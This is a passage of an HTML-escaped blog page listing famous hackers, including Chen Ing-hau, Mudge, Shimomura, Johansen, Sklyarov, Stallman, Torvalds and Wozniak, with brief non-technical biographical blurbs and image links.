&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/J2-FXYAISfQ/http://bp3.blogger.com/_r8GjWqN6cvM/R5mOnNLwbNI/AAAAAAAAAqI/WgCDLukhUUU/s1600-h/hacker_Chen+Ing-hau.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159311652334628050&quot; src=&quot;http://bp3.blogger.com/_r8GjWqN6cvM/R5mOnNLwbNI/AAAAAAAAAqI/WgCDLukhUUU/s320/hacker_Chen+Ing-hau.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;He was the creator of one of the deadly virus of all time &quot;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Chernobyl computer virus&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; &quot; which had melted down many computers worldwide.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;   &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;12.Mudge-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/DvriQhYtORi/http://bp3.blogger.com/_r8GjWqN6cvM/R5iAndLwbHI/AAAAAAAAApY/gw9Slob_7CU/s1600-h/Hackers_mudge.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159014788490095730&quot; src=&quot;http://bp3.blogger.com/_r8GjWqN6cvM/R5iAndLwbHI/AAAAAAAAApY/gw9Slob_7CU/s320/Hackers_mudge.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&quot;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Mudge&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&quot; along with fellow hackers told the committee that computer security is so lax, they could disable the entire Internet in a half-hour.&lt;br /&gt;
&lt;/span&gt;  &lt;b&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;13. Tsutomu Shimomura-&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/k4xTD1d_IBZ/http://bp1.blogger.com/_r8GjWqN6cvM/R5mQdtLwbVI/AAAAAAAAArI/u6eKiSuei8E/s1600-h/Hacker_Tsutomu+Shimomura.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159313688149126482&quot; src=&quot;http://bp1.blogger.com/_r8GjWqN6cvM/R5mQdtLwbVI/AAAAAAAAArI/u6eKiSuei8E/s320/Hacker_Tsutomu+Shimomura.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;One of the world&#39;s top computer security experts. Shimomura helped &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Federal officials &lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;track down and arrest computer&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; hacker Kevin Mitnick&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;in Raleigh Feb. 15, 1995 in connection with a break-in on Shimomura&#39;s computer.&lt;br /&gt;
&lt;/span&gt;  &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;14. Jon Lech Johansen-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/StlFiqD0XdA/http://bp1.blogger.com/_r8GjWqN6cvM/R5mOntLwbRI/AAAAAAAAAqo/_tFmCtZWHHY/s1600-h/hacker_Jon+Lech+Johansen.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159311660924562706&quot; src=&quot;http://bp1.blogger.com/_r8GjWqN6cvM/R5mOntLwbRI/AAAAAAAAAqo/_tFmCtZWHHY/s320/hacker_Jon+Lech+Johansen.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Johansen, who became a hero to computer hackers and was deemed a villain by &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Hollywood,&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; is on trial for writing and distributing a program called&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;DeCSS&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, software which makes it possible to &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;copy protected DVD films&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. Prosecutors have asked to have his computers confiscated and called for him to pay&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; $1,400 in court costs&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;.&lt;br /&gt;
&lt;/span&gt;  &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;15.Dmitry Sklyarov-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/QkvI4ojYus5/http://bp1.blogger.com/_r8GjWqN6cvM/R5mOntLwbPI/AAAAAAAAAqY/QqPQ5r-i5pk/s1600-h/hacker_Dmitry+Sklya.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159311660924562674&quot; src=&quot;http://bp1.blogger.com/_r8GjWqN6cvM/R5mOntLwbPI/AAAAAAAAAqY/QqPQ5r-i5pk/s320/hacker_Dmitry+Sklya.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Russian computer programmer who was charged with&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; violating copyrights&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, Sklyarov was jailed after developing software that allows the user to circumvent the copyright protections in &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Adobe Systems&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; eBook reader program.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;   &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;16.Dennis Moran-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Moran, known on the Web as &quot;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Coolio,&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&quot; pleaded guilty to hacking into &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;national computer sites&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; last year belonging to the &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Army, the Air Force and the anti-drug Dare.com.&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;a href=&quot;http://www.zimbio.com/go/rKh6ND4BVce/http://bp0.blogger.com/_r8GjWqN6cvM/R5mOndLwbOI/AAAAAAAAAqQ/feXJ3AWo5jA/s1600-h/hacker_Dennis+Moran.jpg&quot; style=&quot;font-weight: bold; margin-left: 1em; margin-right: 1em; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159311656629595362&quot; src=&quot;http://bp0.blogger.com/_r8GjWqN6cvM/R5mOndLwbOI/AAAAAAAAAqQ/feXJ3AWo5jA/s320/hacker_Dennis+Moran.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Famous Three Master Hackers&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/nSJ7DfOEfJF/http://bp1.blogger.com/_r8GjWqN6cvM/R5mTbtLwbdI/AAAAAAAAAsI/G4XRNcP8eLc/s1600-h/Hackers_great+three.png&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159316952324271570&quot; src=&quot;http://bp1.blogger.com/_r8GjWqN6cvM/R5mTbtLwbdI/AAAAAAAAAsI/G4XRNcP8eLc/s320/Hackers_great+three.png&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;     &lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Some Grand Famous Hackers of Life Time:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;    &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;1. Richard Stallman-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/MSY2j5WL7h7/http://bp3.blogger.com/_r8GjWqN6cvM/R5h_3dLwbAI/AAAAAAAAAog/8TcJQbXqhvM/s1600-h/Hacker_Stallman.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159013963856374786&quot; src=&quot;http://bp3.blogger.com/_r8GjWqN6cvM/R5h_3dLwbAI/AAAAAAAAAog/8TcJQbXqhvM/s320/Hacker_Stallman.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;He was the founder of &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;GNU Projects&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. Stallman, who prefers to be called&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;rms&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, got his start hacking at &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;MIT&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;. He worked as a &quot;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;staff hacker&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&quot; on the&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Emacs project&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; and others. He was a critic of restricted computer access in the lab. When a password system was installed, Stallman broke it down, resetting passwords to null strings, then sent users messages informing them of the removal of the password system.&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;   &lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;2.Linus Torvalds-&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;a href=&quot;http://www.zimbio.com/go/4HK9UkIfgzt/http://bp1.blogger.com/_r8GjWqN6cvM/R5mR7tLwbYI/AAAAAAAAArg/dpPd5qul4Rw/s1600-h/hacker_linus.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159315303056829826&quot; src=&quot;http://bp1.blogger.com/_r8GjWqN6cvM/R5mR7tLwbYI/AAAAAAAAArg/dpPd5qul4Rw/s320/hacker_linus.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Father of Linux&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; is a good hacker of all time.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;    &lt;b&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;3.Stephen Wozniak-&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/b&gt;&lt;a href=&quot;http://www.zimbio.com/go/j9BD93vwK-D/http://bp0.blogger.com/_r8GjWqN6cvM/R5iAntLwbJI/AAAAAAAAApo/zKfdjlnQ19k/s1600-h/hackers_stephean.jpg&quot; style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; id=&quot;BLOGGER_PHOTO_ID_5159014792785063058&quot; src=&quot;http://bp0.blogger.com/_r8GjWqN6cvM/R5iAntLwbJI/AAAAAAAAApo/zKfdjlnQ19k/s320/hackers_stephean.jpg&quot; style=&quot;border-width: 0px;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&quot;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Woz&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&quot; is famous for being the &quot;&lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;other Steve&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&quot; of Apple. Wozniak, along with current &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Apple CEO Steve Jobs&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, co-founded Apple Computer. Woz got his start in hacking making blue boxes, devices that bypass telephone-switching mechanisms to make free long-distance calls. After reading an article about &lt;/span&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;phone phreaking in Esquire&lt;/span&gt;&lt;/b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;, Wozniak called up his buddy Jobs. The pair did research on frequencies, then built and sold blue boxes to their classmates in college. Wozniak even used a blue box to call the Pope while pretending to be Henry Kissinger.&lt;br /&gt;
&lt;/span&gt;  &lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Some Other famous Hackers :&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;  &lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Dennis Ritchie and Ken Thompson &amp;amp; John Draper&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Johan Helsingius &amp;amp; Eric Steven Raymond&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Ian Murphy&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;John Perry Barlow&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Tim Berner Lee( Father of WWW )&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;b&gt;&lt;i&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;AMIT TYAGI&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; font-size: 14px; line-height: 21px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; font-family: &#39;Times New Roman&#39;; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: arial, verdana, sans-serif; line-height: 21px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;
